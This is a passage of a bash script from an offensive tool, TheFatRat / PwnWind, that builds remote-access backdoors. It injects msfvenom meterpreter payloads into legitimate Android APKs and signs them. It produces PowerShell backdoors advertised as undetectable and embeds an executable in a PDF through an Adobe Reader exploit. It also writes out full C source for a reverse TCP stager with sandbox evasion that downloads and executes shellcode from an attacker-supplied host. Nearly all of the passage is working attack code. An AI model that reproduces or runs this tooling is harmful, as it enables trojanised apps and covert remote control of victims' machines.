           	 		echo set LPORT $uservar >> "temp/meterpreter_mac.rc"
           	 		echo set ExitOnSession false >> "temp/meterpreter_mac.rc"
           	 		echo exploit -j  >> "temp/meterpreter_mac.rc"
           	 		xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_mac.rc"
				clear

			elif test $fatrat1 == '4' #Android
				then
				rm temp/*.rc > /dev/null 2>&1
				touch "temp/meterpreter_android.rc"
           	 		echo use exploit/multi/handler > "temp/meterpreter_android.rc"
				payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/shell/reverse_tcp" --width 350 --height 300) > /dev/null 2>&1
           	 		echo set PAYLOAD $payload >> "temp/meterpreter_android.rc"
				echo -e $okegreen ""
           	 		read -p '  Set LHOST IP: ' uservar
           	 		echo set LHOST $uservar >> "temp/meterpreter_android.rc"
           	 		read -p '  Set LPORT: ' uservar
           	 		echo set LPORT $uservar >> "temp/meterpreter_android.rc"
           	 		echo set ExitOnSession false >> "temp/meterpreter_android.rc"
           	 		echo exploit -j  >> "temp/meterpreter_android.rc"
           	 		xterm -fa monaco -fs 13 -bg black -e $msfconsole -r "temp/meterpreter_android.rc"
				clear

			elif test $fatrat1 == '5'
				then
 				clear
				menu
	 	else
			echo -e "  Incorrect Number"
			fi
			echo -n -e "  Do you want exit? ( Yes / No ) : "
		read back
			if [ $back != 'n' ] && [ $back != 'N' ]
					then

					clear
					exit
			elif [ $back != 'y' ] && [ $back != 'Y' ]
					then
					clisteners
			fi

}


#EMBEDBACKDOORAPK
function embedapk() {
clear
echo -e $okegreen"[ ]===========================================================================$okegreen[ ]"
echo -e $okegreen"[ ]$cyan                                                                      $okegreen     [ ]"
echo -e $okegreen"[ ]$cyan                          )  (         )      )   (    (        )     $okegreen     [ ]   ";
echo -e $okegreen"[ ]$cyan   (     (        (     ( /(  )\ )    ( /(   ( /(   )\ ) )\ )  ( /(  (    $okegreen [ ]   ";
echo -e $okegreen"[ ]$cyan   )\    )\       )\    )\())(()/(    )\())  )\()) (()/((()/(  )\()) )\ )  $okegreen[ ]   ";
echo -e $okegreen"[ ]$cyan  ((_)((((_)(   (((_) |((_)\  /(_))  ((_)\  ((_)\   /(_))/(_))((_)\ (()/(  $okegreen[ ]   ";
echo -e $okegreen"[ ]$cyan  (_)   )\_ )\  )\___ |_ ((_)(_))_   ((_)   ((_)   (_)) (_))  _((_) /(_))_ $okegreen[ ]  ";
echo -e $okegreen"[ ]$cyan | _ ) (_)_\(_)((/ __|| |/ /  |   \  / _ \  / _ \ | _ \|_ _| | \| |(_)) __|$okegreen[ ] ";
echo -e $okegreen"[ ]$cyan | _ \  / _ \   | (__   ' <   | |) || (_) || (_) ||   / | |  | .\` |  | (_ |$okegreen[ ] ";
echo -e $okegreen"[ ]$cyan |___/ /_/ \_\   \___| _|\_\  |___/  \___/  \___/ |_|_\|___| |_|\_|   \___|$okegreen[ ]";
echo -e $okegreen"[ ]$okegreen===========================================================================$okegreen[ ]"
echo -e $okegreen"[ ]$red            Embed a Metasploit Payload in an original .apk files           $okegreen[ ]"
echo -e $okegreen"[ ]$red This script is POC for injecting metasploit payload arbitary apk backdoor $okegreen[ ]"
echo -e $okegreen"[ ]$okegreen===========================================================================$okegreen[ ]"
echo ""
echo "Cleaning Temp files"
rm -rf output/*
rm -rf backdoored/output/*
sleep 2
echo "Done!"
echo -e $okegreen""
sleep 1
echo -ne " SET LHOST : ";tput sgr0
read yourip
echo ""
echo -ne $okegreen "SET LPORT : ";tput sgr0
read yourport
echo ""
echo -ne $okegreen "Located Original Apk file for embed (example:$path/PE/instagram.apk) :" ;tput sgr0
read copyfile
cp $copyfile $path/output/fatrat.apk >/dev/null 2>&1
apkt="$path/output/fatrat.apk"

if [ ! -f $apkt ]; then
    echo "[!] There was an error copying your APK to a temporary folder , make sure you wrote the right path "
    read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key
menu
  fi 

$unzip -l $apkt > /dev/null 2>&1
  rc=$?
  if [ $rc != 0 ]; then
    echo "[!] Original APK file specified is not valid"
    read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key
    menu
  fi
echo ""
payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "android/meterpreter/reverse_http" FALSE "android/meterpreter/reverse_https" FALSE "android/meterpreter/reverse_tcp" FALSE "android/shell/reverse_http" FALSE "android/shell/reverse_https" FALSE "android/shell/reverse_tcp" --width 350 --height 300) > /dev/null 2>&1
echo ""
echo ""
echo ""
spinlong
gboor2
spinlong
echo ""
sleep 1
echo "Creating RAT payload with msfvenom"
$msfvenom -f raw -p $payload LHOST=$yourip LPORT=$yourport -o $path/output/payload.apk
echo "Done !" 
sleep 2
echo "Starting the merging process of RAT with the APK you selected"
echo ""
ruby $apkembed $path/output/fatrat.apk 
echo ""
sleep 2
cp $path/output/fatrat_backdoored.apk $path/backdoored/apkembed.apk >/dev/null 2>&1
varopt="$path/backdoored/apkembed.apk"
if [ ! -f $varopt ]; then
    echo "[!] There was an error in the creation of your RAT APK file , the possible reasons are :
- The architecture of the file is not for android 
- The original APK is protected
- It was not possible to inject the payload in the hook you selected (in this case select a different hook point)"
    read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key
menu
fi
echo "File copied with success to : $path/backdoored"
sleep 2
echo "Removing temporary files from output"
sleep 2
rm -rf $path/output/* >/dev/null 2>&1
echo "Signing your APK file"
sleep 2
java -jar $bundle $cert $key $path/backdoored/apkembed.apk Apk_embed_backdoor.apk
rm $path/backdoored/apkembed.apk >/dev/null 2>&1
mv $path/Apk_embed_backdoor.apk $path/backdoored/output/ >/dev/null 2>&1
outapk="$path/backdoored/output/Apk_embed_backdoor.apk"
if [ ! -f $outapk ]; then
    echo "[!] APK Rat file was not found in : $path/backdoored/output/"
    read -rsp $'Press any key to continue to return to fatrat menu\n' -n 1 key
menu
  fi 
echo -ne $okegreen" Your payload has been successfully embed with sign and is located here :
 $path/backdoored/output/Apk_embed_backdoor.apk"
read loveyou
echo
clear
menu
}

###########################################################
#PwnWind v1.2
#Developed or original code Edo Maland (Screetsec)
############################################################
function PwnWinds() {
clear
echo ""
echo ""
echo -e $cyan" 	[ Select an Option To Begin >>"
echo ""
echo -e $lightgreen"	________                 ___       ______       _________       ";
echo "	___  __ \__      __________ |     / /__(_)____________  /_______";
echo "	__  /_/ /_ | /| / /_  __ \_ | /| / /__  /__  __ \  __  /__  ___/";
echo "	_  ____/__ |/ |/ /_  / / /_ |/ |/ / _  / _  / / / /_/ / _(__  ) ";
echo "	/_/     ____/|__/ /_/ /_/____/|__/  /_/  /_/ /_/\__,_/  /____/  ";
echo ""
echo -e $cyan"	                          ______    "
echo "	                       .-        -. "
echo "	                      /            \         "
echo "	                     |,  .-.  .-.  ,|      "
echo "	                     | )(_ /  \_ )( |"
echo "	                     |/     /\     \|    "
echo -e $red"	         $yellow  (@_   $cyan    <__    ^^    __>        "
echo -e $red"	      _     ) \_______$cyan""\__|IIIIII|__/$red""____________________ "
echo -e $red"	     (_)$yellow\@8@8{}<$red""________________________________________$yellow> "
echo -e $red"	            )_/    $cyan     \ IIIIII /                    "
echo -e $red"	         $yellow  (@        $cyan    --------                      "
echo -e $cyan"		            PwnWind Version $red v1.2 "
echo -e $cyan"		        Pwned Windows with backdoor"
echo -e " 		      Author : $red""Edo Maland (Screetsec)"
echo -e $red"  	     Powershell$cyan Injection attacks on any$red Windows Platform	           ";
			echo ""
 			echo -e $yellow"	[1] $okegreen Create a bat file+Powershell (FUD 100%)"
 			echo -e $yellow"	[2] $okegreen Create exe file with C# + Powershell (FUD 100%) "
	 		echo -e $yellow"        [3] $okegreen Create exe file with apache + Powershell (FUD 100%)"
 			echo -e $yellow"	[4] $okegreen Create exe file with C + Powershell (FUD 98 %)"
 			echo -e $yellow"	[5] $okegreen Create Backdoor with C + Powershell + Embed Pdf (FUD 80%)"
 			echo -e $yellow"	[6] $okegreen Create Backdoor with C / Meteperter_reverse_tcp (FUD 97%)"
 			echo -e $yellow"	[7] $okegreen Create Backdoor with C / Metasploit Staging Protocol (FUD 98%)"
			echo -e $yellow"        [8] $okegreen Back to Menu "
 			echo -e $yellow" "
 			echo -n -e $red'  \033[4mPwnWind$fatrat:\033[0m>> '; tput sgr0 #insert your choice
 			read fatrat1

			if test $fatrat1 == '1' #NUMBER 1 BEBE
				then
					echo ""
					echo -e $okegreen""
					echo -ne "  SET LHOST : ";tput sgr0
					read yourip
					echo ""
					echo -ne $okegreen " SET LPORT : ";tput sgr0
					read yourport
					echo ""
					echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0
					read fira
					payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1
					spinlong
					echo ""
					echo ""
					gboor
					spinlong
					echo ""
					$pwned $payload $yourip $yourport > /dev/null 2>&1
					echo ""
					echo ""
					cat powershell_attack.txt
					sleep 2
					rm unicorn.rc
					mv powershell_attack.txt output/$fira.bat 
					echo ""
					echo -e $okegreen""
					echo -e "Backdoor Saved To output Folder "

					elif test $fatrat1 == '2' #cPAGAR-POWERSHELL
					then
					echo ""
					echo -e $okegreen""
					echo -ne "  SET LHOST : ";tput sgr0
					read yourip
					echo ""
					echo -ne $okegreen " SET LPORT : ";tput sgr0
					read yourport
					echo ""
					echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0
					read fira
					payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1
					spinlong
					echo ""
					echo ""
					gboor
					spinlong
					echo ""
					$pwned $payload $yourip $yourport > /dev/null 2>&1
					echo ""
					echo ""

					s0=$(cat powershell_attack.txt | cut -d ' ' -f1)
					s1=$(cat powershell_attack.txt | cut -d ' ' -f2)
					s2=$(cat powershell_attack.txt | cut -d ' ' -f3)
					s3=$(cat powershell_attack.txt | cut -d ' ' -f4)
					s4=$(cat powershell_attack.txt | cut -d ' ' -f5)

					sed s/PAYLOAD/$s0\ $s1\ $s2\ $s3\ $s4/g $B > $bcom
					echo
					dmcs $bcom -o "output/$fira.exe" > /dev/null 2>&1
					rm unicorn.rc powershell_attack.txt $bcom
					sleep 2
					echo ""
					echo -e $okegreen""
					echo -e "Backdoor Saved To output Folder "


				elif test $fatrat1 == '3' #Apachecompler
					then
					echo ""
					echo -e $okegreen""
					echo -e $okegreen " Starting Apache Server wait ..."
					service apache2 start > /dev/null 2>&1
					echo ""
					echo -ne "  SET LHOST : ";tput sgr0
					read yourip
					echo ""
					echo -ne $okegreen " SET LPORT : ";tput sgr0
					read yourport
					echo ""
					echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0
					read fira
					payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1
					spinlong
					echo ""
					echo ""
					gboor
					spinlong
					echo ""
					$pwned $payload $yourip $yourport > /dev/null 2>&1
					echo ""
					echo $yourip >> "$out"

					s0=$(cat $out | cut -d ' ' -f1)

					sed s/SERVER/$s0/g $apache > $apachecom
					echo
					$COMPILER -Wall -mwindows icons/icon.res $apachecom -o "output/$fira.exe" > /dev/null 2>&1
					rm unicorn.rc  $apachecom $out
					mv powershell_attack.txt $apache2
					sleep 2
					echo ""
					echo -e $okegreen""
					echo -e "  Backdoor Saved To output Folder "
					echo ""
					echo -ne "  Press any key to continue ......... "
					read continue


					elif test $fatrat1 == '4' #C AJA
					then
					echo ""
					echo -e $okegreen""
					echo -ne "  SET LHOST : ";tput sgr0
					read yourip
					echo ""
					echo -ne $okegreen " SET LPORT : ";tput sgr0
					read yourport
					echo ""
					echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0
					read fira
					payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1
					spinlong
					echo ""
					echo ""
					gboor
					spinlong
					echo ""
					$pwned $payload $yourip $yourport > /dev/null 2>&1
					echo ""
					echo ""

					s0=$(cat powershell_attack.txt | cut -d ' ' -f1)
					s1=$(cat powershell_attack.txt | cut -d ' ' -f2)
					s2=$(cat powershell_attack.txt | cut -d ' ' -f3)
					s3=$(cat powershell_attack.txt | cut -d ' ' -f4)
					s4=$(cat powershell_attack.txt | cut -d ' ' -f5)

					sed s/PAYLOAD/$s0\ $s1\ $s2\ $s3\ $s4/g $C > $paycom
					echo
					$COMPILER -Wall -mwindows icons/icon.res $paycom -o "output/$fira.exe" > /dev/null 2>&1
					rm unicorn.rc powershell_attack.txt $paycom
					sleep 2
					echo ""
					echo -e $okegreen""
					echo -e "  Backdoor Saved To output Folder "
					echo ""
					echo -ne "  Press any key to continue ......... "
					read continue

					elif test $fatrat1 == '5' #PDF+POWERSHELL+C
					then
					echo
					echo -e $yellow"  Worked on Adobe Reader v8.x, v9.x / Windows XP SP3 / Windows 7/Vista ( English )"
					echo -e $okegreen""
					echo -ne "  SET LHOST : ";tput sgr0
					read yourip
					echo ""
					echo -ne $okegreen " SET LPORT : ";tput sgr0
					read yourport
					echo ""
					echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0
					read fira
					echo ""
					echo -ne $okegreen " Located Original PDF file for embed (example:/TheFatRat/PE/original.pdf) :" ;tput sgr0
					read embedpdf
					payload=$(zenity --list --title "☣ TheFatRat ☣" --text "\nAvailable Payloads:" --radiolist --column "Pick" --column "Option" TRUE "windows/shell_bind_tcp" FALSE "windows/shell/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp" FALSE "windows/meterpreter/reverse_tcp_dns" FALSE "windows/meterpreter/reverse_http" FALSE "windows/meterpreter/reverse_https" --width 350 --height 265) > /dev/null 2>&1
					spinlong
					echo ""
					echo ""
					gboor
					spinlong
					echo ""
					$pwned $payload $yourip $yourport > /dev/null 2>&1
					echo ""
					echo ""

					s0=$(cat powershell_attack.txt | cut -d ' ' -f1)
					s1=$(cat powershell_attack.txt | cut -d ' ' -f2)
					s2=$(cat powershell_attack.txt | cut -d ' ' -f3)
					s3=$(cat powershell_attack.txt | cut -d ' ' -f4)
					s4=$(cat powershell_attack.txt | cut -d ' ' -f5)

					sed s/PAYLOAD/$s0\ $s1\ $s2\ $s3\ $s4/g $C > $pdfcom
					echo
					$COMPILER -Wall -mwindows icons/icon.res $pdfcom -o "$path/output/backdoor_for_pdf.exe" > /dev/null 2>&1
					sleep 2
					echo " Wait for embed exe to pdf ....  "
					xterm -T " TheFatRat < PDF BUILDER > " -geometry 110x23 -e "$msfconsole -x 'use windows/fileformat/adobe_pdf_embedded_exe; set EXE::Custom $path/output/backdoor_for_pdf.exe; set FILENAME $fira.pdf; set INFILENAME $embedpdf; exploit; exit -y'" > /dev/null 2>&1
					echo ""
					mv ~/.msf4/local/$fira.pdf $path/output/$fira.pdf 
					rm unicorn.rc powershell_attack.txt
					echo -e $okegreen""
					echo -e $yellow"  Backdoor PDF Saved To output Folder "
					echo ""
					echo -ne $okegreen"  Press any key to continue ......... "
					read continue

        elif test $fatrat1 == '6' #C Meteperter_reverse_tcp
        then
        echo ""
        echo -e $okegreen""
        echo -ne "  SET LHOST : ";tput sgr0
        read yourip
        echo ""
        echo -ne $okegreen " SET LPORT : ";tput sgr0
        read yourport
        echo ""
        echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0
        read fira
        spinlong
        echo ""
        echo ""
        gboor
        spinlong
        echo ""
        echo '#include <stdio.h>' > $reverse1
        echo '#include <stdlib.h>' >> $reverse1
        echo '#include <winsock2.h>' >> $reverse1
        echo '#include <windows.h>' >> $reverse1
        echo 'void winsock_init();' >> $reverse1
        echo 'void Kick(SOCKET my_socket, char * error);' >> $reverse1
        echo 'void genlol();' >> $reverse1
        echo 'int recv_all(SOCKET my_socket, void * buffer, int len);' >> $reverse1
        echo 'SOCKET wsconnect(char * targetip, int port);' >> $reverse1
        echo 'int random_in_range (unsigned int min, unsigned int max);' >> $reverse1
        echo 'char* rev(char* str);' >> $reverse1
        echo 'int sandbox_evasion();' >> $reverse1
        echo 'inline void reverse_tcp_meterpreter(char * listenerIP,unsigned int listenerPort);' >> $reverse1
        echo 'void winsock_init() {' >> $reverse1
        echo ' WSADATA wsaData;' >> $reverse1
        echo ' WORD wVersionRequested;' >> $reverse1
        echo ' wVersionRequested = MAKEWORD(2, 2);' >> $reverse1
        echo ' if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> $reverse1
        echo ' printf("ws2_32.dll is out of date.\n");' >> $reverse1
        echo ' WSACleanup();' >> $reverse1
        echo ' exit(1);' >> $reverse1
        echo ' }' >> $reverse1
        echo '}' >> $reverse1
        echo 'void Kick(SOCKET my_socket, char * error) {' >> $reverse1
        echo ' printf("error: %s\n", error);' >> $reverse1
        echo ' closesocket(my_socket);' >> $reverse1
        echo ' WSACleanup();' >> $reverse1
        echo ' exit(1);' >> $reverse1
        echo ' }' >> $reverse1
        echo 'void genlol(){' >> $reverse1
        echo ' int num1, num2, num3;' >> $reverse1
        echo ' num1=100;' >> $reverse1
        echo ' while (num1<=5) {' >> $reverse1
        echo ' num1=random_in_range(0,10000);' >> $reverse1
        echo ' num2=random_in_range(0,10000);' >> $reverse1
        echo ' num3=random_in_range(0,10000);' >> $reverse1
        echo ' }' >> $reverse1
        echo '}' >> $reverse1
        echo 'int recv_all(SOCKET my_socket, void * buffer, int len) {' >> $reverse1
        echo ' int tret = 0;' >> $reverse1
        echo ' int nret = 0;' >> $reverse1
        echo ' void * startb = buffer;' >> $reverse1
        echo ' while (tret < len) {' >> $reverse1
        echo ' nret = recv(my_socket, (char *)startb, len - tret, 0);' >> $reverse1
        echo ' startb += nret;' >> $reverse1
        echo ' tret += nret;' >> $reverse1
        echo ' if (nret == SOCKET_ERROR)' >> $reverse1
        echo ' Kick(my_socket, "Could not receive data");' >> $reverse1
        echo ' }' >> $reverse1
        echo ' return tret;' >> $reverse1
        echo '}' >> $reverse1
        echo 'SOCKET wsconnect(char * targetip, int port) {' >> $reverse1
        echo ' struct hostent * target;' >> $reverse1
        echo ' struct sockaddr_in sock;' >> $reverse1
        echo ' SOCKET my_socket;' >> $reverse1
        echo ' my_socket = socket(AF_INET, SOCK_STREAM, 0);' >> $reverse1
        echo ' if (my_socket == INVALID_SOCKET)' >> $reverse1
        echo ' Kick(my_socket, "Cannot initialize socket");' >> $reverse1
        echo ' target = gethostbyname(targetip);' >> $reverse1
        echo ' if (target == NULL)' >> $reverse1
        echo ' Kick(my_socket, "cannot resolve target");' >> $reverse1
        echo ' memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);' >> $reverse1
        echo ' sock.sin_family = AF_INET;' >> $reverse1
        echo ' sock.sin_port = htons(port);' >> $reverse1
        echo ' if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )' >> $reverse1
        echo ' Kick(my_socket, "Could not connect");' >> $reverse1
        echo ' return my_socket;' >> $reverse1
        echo '}' >> $reverse1
        echo 'int random_in_range (unsigned int min, unsigned int max)' >> $reverse1
        echo '{' >> $reverse1
        echo ' int base_random = rand(); ' >> $reverse1
        echo ' if (RAND_MAX == base_random){' >> $reverse1
        echo ' return random_in_range(min, max);' >> $reverse1
        echo ' }' >> $reverse1
        echo ' int range = max - min,' >> $reverse1
        echo ' remainder = RAND_MAX % range,' >> $reverse1
        echo ' bucket = RAND_MAX / range;' >> $reverse1
        echo ' if (base_random < RAND_MAX - remainder) {' >> $reverse1
        echo ' return min + base_random/bucket;' >> $reverse1
        echo ' } else {' >> $reverse1
        echo ' return random_in_range (min, max);' >> $reverse1
        echo ' }' >> $reverse1
        echo '}' >> $reverse1
        echo 'char* rev(char* str)' >> $reverse1
        echo '{' >> $reverse1
        echo ' int end=strlen(str)-1;' >> $reverse1
        echo ' int i;' >> $reverse1
        echo ' for(i=5; i<end; i++)' >> $reverse1
        echo ' {' >> $reverse1
        echo ' str[i] ^= 1;' >> $reverse1
        echo ' }' >> $reverse1
        echo ' return str;' >> $reverse1
        echo '}' >> $reverse1
        echo 'int sandbox_evasion(){' >> $reverse1
        echo ' MSG msg;' >> $reverse1
        echo ' DWORD tc;' >> $reverse1
        echo ' PostThreadMessage(GetCurrentThreadId(), WM_USER + 2, 23, 42);' >> $reverse1
        echo ' if (!PeekMessage(&msg, (HWND)-1, 0, 0, 0))' >> $reverse1
        echo ' return -1;' >> $reverse1
        echo ' if (msg.message != WM_USER+2 || msg.wParam != 23 || msg.lParam != 42)' >> $reverse1
        echo ' return -1;' >> $reverse1
        echo ' tc = GetTickCount();' >> $reverse1
        echo ' Sleep(650);' >> $reverse1
        echo ' if (((GetTickCount() - tc) / 300) != 2)' >> $reverse1
        echo ' return -1;' >> $reverse1
        echo ' return 0;' >> $reverse1
        echo '}' >> $reverse1
        echo 'void reverse_tcp_meterpreter(char * listenerIP,unsigned int listenerPort){' >> $reverse1
        echo ' ULONG32 size;' >> $reverse1
        echo ' char * buffer;' >> $reverse1
        echo ' void (*function)();' >> $reverse1
        echo ' winsock_init();' >> $reverse1
        echo ' SOCKET my_socket = wsconnect(listenerIP, listenerPort);' >> $reverse1
        echo ' int count = recv(my_socket, (char *)&size, 4, 0);' >> $reverse1
        echo ' if (count != 4 || size <= 0)' >> $reverse1
        echo ' Kick(my_socket, "bad length value\n");' >> $reverse1
        echo ' genlol();' >> $reverse1
        echo ' buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);' >> $reverse1
        echo ' genlol();' >> $reverse1
        echo ' if (buffer == NULL)' >> $reverse1
        echo ' Kick(my_socket, "bad buffer\n");' >> $reverse1
        echo ' buffer[0] = 0xBF;' >> $reverse1
        echo ' genlol();' >> $reverse1
        echo ' memcpy(buffer + 1, &my_socket, 4);' >> $reverse1
        echo ' genlol();' >> $reverse1
        echo ' count = recv_all(my_socket, buffer + 5, size);' >> $reverse1
        echo ' function = (void (*)())buffer;' >> $reverse1
        echo ' function();' >> $reverse1
        echo '}' >> $reverse1
        echo 'void reverse_tcp_meterpreter_x64(char * listenerIP,unsigned int listenerPort){' >> $reverse1
        echo ' ULONG32 size;' >> $reverse1
        echo ' char * buffer;' >> $reverse1
        echo ' void (*function)();' >> $reverse1
        echo ' winsock_init();' >> $reverse1
        echo ' SOCKET my_socket = wsconnect(listenerIP, listenerPort);' >> $reverse1
        echo ' int count = recv(my_socket, (char *)&size, 4, 0);' >> $reverse1
        echo ' if (count != 4 || size <= 0)' >> $reverse1
        echo ' Kick(my_socket, "bad length value\n");' >> $reverse1
        echo ' genlol();' >> $reverse1
        echo ' buffer = VirtualAlloc(0, size + 10, MEM_COMMIT, PAGE_EXECUTE_READWRITE);' >> $reverse1
        echo ' genlol();' >> $reverse1
        echo ' if (buffer == NULL)' >> $reverse1
        echo ' Kick(my_socket, "bad buffer\n");' >> $reverse1
        echo ' buffer[0] = 0x48;' >> $reverse1
        echo ' buffer[1] = 0xBF;' >> $reverse1
        echo ' genlol();' >> $reverse1
        echo ' memcpy(buffer + 2, &my_socket, 8);' >> $reverse1
        echo ' genlol();' >> $reverse1
        echo ' count = recv_all(my_socket, buffer + 10, size);' >> $reverse1
        echo ' function = (void (*)())buffer;' >> $reverse1
        echo ' function();' >> $reverse1
        echo '}' >> $reverse1
        echo 'int main(int argc, char *argv[]) {' >> $reverse1
        echo -n 'char * defaultListenerIP = "' >> $reverse1
        echo -n $yourip >> $reverse1
        echo -n '";' >> $reverse1
        echo '' >> $reverse1
        echo -n 'unsigned int defaultListenerPort = ' >> $reverse1
        echo -n $yourport >> $reverse1
        echo -n ';' >> $reverse1
        echo '' >> $reverse1
        echo ' sandbox_evasion();' >> $reverse1
        echo ' if(argc == 3){' >> $reverse1
        echo ' #ifdef ISX64' >> $reverse1
        echo ' reverse_tcp_meterpreter_x64(argv[1], atoi(argv[2]));' >> $reverse1
        echo ' #else' >> $reverse1
        echo ' reverse_tcp_meterpreter_x64(argv[1], atoi(argv[2]));' >> $reverse1
        echo ' #endif' >> $reverse1
        echo ' }else{' >> $reverse1
        echo ' #ifdef ISX64' >> $reverse1
        echo ' reverse_tcp_meterpreter_x64(defaultListenerIP, defaultListenerPort);' >> $reverse1
        echo ' #else' >> $reverse1
        echo ' reverse_tcp_meterpreter_x64(defaultListenerIP, defaultListenerPort);' >> $reverse1
        echo ' #endif' >> $reverse1
        echo ' }' >> $reverse1
        echo ' return 0;' >> $reverse1
        echo '}' >> $reverse1
        $COMPILER $reverse1 -o output/$fira.exe -lws2_32 -mwindows
	      echo
        echo -e $yellow " [+]"$okegreen"Compiling Binary Done  ";tput sgr0
        rm $reverse1
	      echo -ne $yellow " Press Enter key to Contiune ..."
        read aw
	      PwnWinds

      elif test $fatrat1 == '7' #C Staging Protocol Meteperter
      then
      echo ""
      echo -e $okegreen""
      echo -ne "  SET LHOST : ";tput sgr0
      read yourip
      echo ""
      echo -ne $okegreen " SET LPORT : ";tput sgr0
      read yourport
      echo ""
      echo -ne $okegreen " Please enter the base name for output files :" ;tput sgr0
      read fira
      spinlong
      echo ""
      echo ""
      gboor
      spinlong
      echo ""
      echo '#include <stdio.h>'> $stag
      echo '#include <stdlib.h>' >> $stag
      echo '#include <winsock2.h>' >> $stag
      echo '#include <windows.h>' >> $stag
      echo -n 'unsigned char server[]="' >> $stag
      echo -n $yourip >> $stag
      echo -n '";' >> $stag
      echo '' >> $stag
      echo -n 'unsigned char serverp[]="' >> $stag
      echo -n $yourport >> $stag
      echo -n '";' >> $stag
      echo '' >> $stag
      echo 'void winsock_init() {' >> $stag
      echo '    WSADATA    wsaData;' >> $stag
      echo '    WORD    wVersionRequested;' >> $stag
      echo '    wVersionRequested = MAKEWORD(2, 2);'>> $stag
      echo '    if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> $stag
      echo '         printf("ws2_32.dll is out of date.\n"); '>> $stag
      echo '         WSACleanup(); '>> $stag
      echo '        exit(1);'>> $stag
      echo '    }' >> $stag
      echo ' }' >> $stag
      echo ' void punt(SOCKET my_socket, char * error) {' >> $stag
      echo '    printf("Bad things: %s\n", error);'>> $stag
      echo '    closesocket(my_socket);'>> $stag
      echo '    WSACleanup();'>> $stag
      echo '    exit(1);' >> $stag
      echo ' }' >> $stag
      echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> $stag
      echo '    int    tret   = 0;'>> $stag
      echo '    int    nret   = 0;'>>$stag
      echo '    void * startb = buffer;'>> $stag
      echo '    while (tret < len) {'>>$stag
      echo '        nret = recv(my_socket, (char *)startb, len - tret, 0);'>> $stag
      echo '        startb += nret;'>> $stag
      echo '        tret   += nret;'>>$stag
      echo '         if (nret == SOCKET_ERROR)'>> $stag
      echo '            punt(my_socket, "Could not receive data");'>> $stag
      echo '    }'>>$stag
      echo '    return tret;'>> $stag
      echo '}' >> $stag
      echo 'SOCKET wsconnect(char * targetip, int port) {'>> $stag
      echo '    struct hostent *        target;' >> $stag
      echo '    struct sockaddr_in     sock;' >> $stag
      echo '    SOCKET             my_socket;'>>$stag
      echo '    my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> $stag
      echo '     if (my_socket == INVALID_SOCKET)'>> $stag
      echo '        punt(my_socket, ".");'>>$stag
      echo '    target = gethostbyname(targetip);'>>$stag
      echo '    if (target == NULL)'>>$stag
      echo '        punt(my_socket, "..");'>>$stag
      echo '    memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>>$stag
      echo '    sock.sin_family = AF_INET;'>> $stag
      echo '    sock.sin_port = htons(port);'>>$stag
      echo '    if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>>$stag
      echo '         punt(my_socket, "...");'>>$stag
      echo '    return my_socket;'>>$stag
      echo '}' >> $stag
      echo 'int main(int argc, char * argv[]) {' >> $stag
      echo '  FreeConsole();'>>$stag
      echo '    ULONG32 size;'>>$stag
      echo '    char * buffer;'>>$stag
      echo '    void (*function)();'>>$stag
      echo '    winsock_init();'>> $stag
      echo '    SOCKET my_socket = wsconnect(server, atoi(serverp));'>>$stag
      echo '    int count = recv(my_socket, (char *)&size, 4, 0);'>>$stag
      echo '    if (count != 4 || size <= 0)'>>$stag
      echo '        punt(my_socket, "read a strange or incomplete length value\n");'>>$stag
      echo '    buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>>$stag
